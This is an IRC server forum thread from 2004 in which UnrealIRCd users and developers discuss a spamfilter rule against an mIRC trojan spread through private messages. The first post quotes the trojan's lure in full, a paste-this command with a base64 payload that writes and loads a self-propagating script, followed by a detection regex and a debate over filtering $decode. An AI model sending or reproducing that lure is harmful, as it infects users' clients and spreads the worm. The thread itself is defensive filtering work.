UnrealIRCd Forums

Welcome to the UnrealIRCd Forums!
https://forums.unrealircd.org/

new one.. similar to matrix2 and nospam ones

https://forums.unrealircd.org/viewtopic.php?t=454

Page 1 of 1

new one.. similar to matrix2 and nospam ones

Posted: Sun Jun 20, 2004 12:57 pm
by nexus
this is sent only via onjoin pm (as you can see if you check it out in mirc with an echo statement ;)):

Code: Select all

<WenW> Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs $decode(bmV3Yg==,m)
heres my filter, works well so far:

Code: Select all

spamfilter {
     regex "^Want To Be An IRCOp\? Try This New Bug Type: //write (\$decode\(.+=.?,m\)){1} \| \.load -rs \$decode\(.+=.?,m\)$";
     target private;
     action block;
     reason "Spamming users with an mIRC trojan. Type '/unload -rs newb' to remove the trojan.";
};

Posted: Sat Jun 26, 2004 6:00 pm
by Syzop
Ok, added in CVS.

Could you explain why you did (see underlined chars):
regex "^Want To Be An IRCOp\? Try This New Bug Type: //write (\$decode\(.+=.?,m\)){1} \| \.load -rs \$decode\(.+=.?,m\)$";

I removed that, since it seemed useless.

Posted: Sat Jun 26, 2004 9:26 pm
by nexus
I did that becuase there are 2 instances of $decode before the first pipe ;)

{1} means the preceding text will be repeated one time.. it does not start counting until after the first instance.. so since $decode gets used twice before the pipe, that (){1} works good ;)


but, I do think the entry you have added in cvs is better, because it will catch more variants that may pop up with $decode (and they will too)

Posted: Sun Jun 27, 2004 12:45 am
by aquanight
heh, personally, I would just block $decode and $encode altogether...

... for the main reason that you can't exactly verify the contents of any message using $decode or $encode without unencoding it. If it has | characters, you might wind up setting it off :) (unless you use /echo with only one slash).

If people need to send stuff like that, they really should use DCC. It's much easier to verify them, because I could then pop the file in notepad and have a look at what I was sent. AFAIK, opening any file in Notepad/Wordpad/vi[m]/emacs/nano, or heck, cat is pretty much harmless. Or if I really don't trust the file, I would simply hit Ignore on the DCC Get dialog :) .

*edit* Can someone enable right margins for the forum? Because these long regexes play havoc on the layout :P And my 800X600 screen can't handle it :( */edit*

Posted: Sun Jun 27, 2004 2:37 am
by codemastr
heh, personally, I would just block $decode and $encode altogether...
* User joins #mirc
<User> Can anyone help me with $encode? I'm trying to use it to encode an email attachment.

And that's why it's a bad idea to do that. $encode and $decode are not inherently bad. First off, I don't use mIRC, so why should I be banned from saying it? It doesn't affect me at all. Second, what if I have a completely valid reason for saying it?
All times are UTC
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited